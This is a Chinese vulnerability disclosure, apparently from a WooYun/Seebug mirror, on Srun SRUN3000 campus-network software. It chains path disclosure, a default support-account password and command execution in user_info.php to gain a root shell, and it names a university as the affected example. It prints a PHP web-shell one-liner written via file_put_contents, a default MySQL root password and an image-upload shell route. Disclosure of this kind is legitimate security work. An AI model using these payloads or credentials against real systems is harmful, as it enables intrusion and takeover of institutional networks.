VULHUB ™

### 简要描述： 深澜软件鸡肋漏洞造成getshell ### 详细说明： 有好几个鸡肋漏洞，就造成了getshell。 本例以中枪的陕西科技大学为例。 1.爆路径问题http://xxxx.xx:8080/global.php，所有均存在路径泄露 [<img src="https://images.seebug.org/upload/201403/13135631edc06c2684f202fa369f92f93440250c.png" alt="wy1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/13135631edc06c2684f202fa369f92f93440250c.png) 不过实际路径是/srun3/srun/services/ （1）80端口路径/srun3/web/ （2）8800端口路径/srun3/srun/services/ （3）8080/8081端口路径/srun3/srun/web/ 2.管理后台（8080/8081端口），默认口令 support b******s(我就不透漏了)，这是srun远程支持的口令。superadmin权限 [<img src="https://images.seebug.org/upload/201403/1314025661d0538eb716a3b589b6e8e2752977dc.png" alt="wy2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/1314025661d0538eb716a3b589b6e8e2752977dc.png) 3.命令执行.80端口/user_info.php getshell： 该系统以root权限运行，所以妈妈再也不担心我没写入权限的问题了。 由于系统过滤$_POST等等一些蛋疼的东西，我只好采用笨办法 命令执行echo写入<?php...

### 简要描述： 深澜软件鸡肋漏洞造成getshell ### 详细说明： 有好几个鸡肋漏洞，就造成了getshell。 本例以中枪的陕西科技大学为例。 1.爆路径问题http://xxxx.xx:8080/global.php，所有均存在路径泄露 [<img src="https://images.seebug.org/upload/201403/13135631edc06c2684f202fa369f92f93440250c.png" alt="wy1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/13135631edc06c2684f202fa369f92f93440250c.png) 不过实际路径是/srun3/srun/services/ （1）80端口路径/srun3/web/ （2）8800端口路径/srun3/srun/services/ （3）8080/8081端口路径/srun3/srun/web/ 2.管理后台（8080/8081端口），默认口令 support b******s(我就不透漏了)，这是srun远程支持的口令。superadmin权限 [<img src="https://images.seebug.org/upload/201403/1314025661d0538eb716a3b589b6e8e2752977dc.png" alt="wy2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/1314025661d0538eb716a3b589b6e8e2752977dc.png) 3.命令执行.80端口/user_info.php getshell： 该系统以root权限运行，所以妈妈再也不担心我没写入权限的问题了。 由于系统过滤$_POST等等一些蛋疼的东西，我只好采用笨办法 命令执行echo写入<?php file_put_contents(base64_decode(/srun3/web/xx.php),base64_decode(<?php @eval($_POST['xxx']);?>));?>路径跟一句话都base64code一下就行，对应80端口。访问后生成xx.php 然后奇葩的是php标签的>这个被吃掉了，好吧，那就再echo加上。 [<img src="https://images.seebug.org/upload/201403/131411366068b267cff2670b6867bcff3df0f5cb.png" alt="wy3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/131411366068b267cff2670b6867bcff3df0f5cb.png) 当然了，getshell也有别的方法，登录管理后台，上传图片马或者直接上传txt，然后copy成php就ok了。 由于srun后台没有像cms那样的能直接打补丁的插件，所以，众多高校级公司都没能打上补丁。 以上漏洞，通杀所有srun3000。 通用口令的，当然通杀，不止这个，mysqlroot默认为srun3000.深澜在给客户安装调试时难道就没给客户考虑考虑安全性么？默认口令害死人啊！ ### 漏洞证明： [<img src="https://images.seebug.org/upload/201403/131413352ec436bf57b17cf096c4f40b9a00ad5f.png" alt="wy4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/131413352ec436bf57b17cf096c4f40b9a00ad5f.png)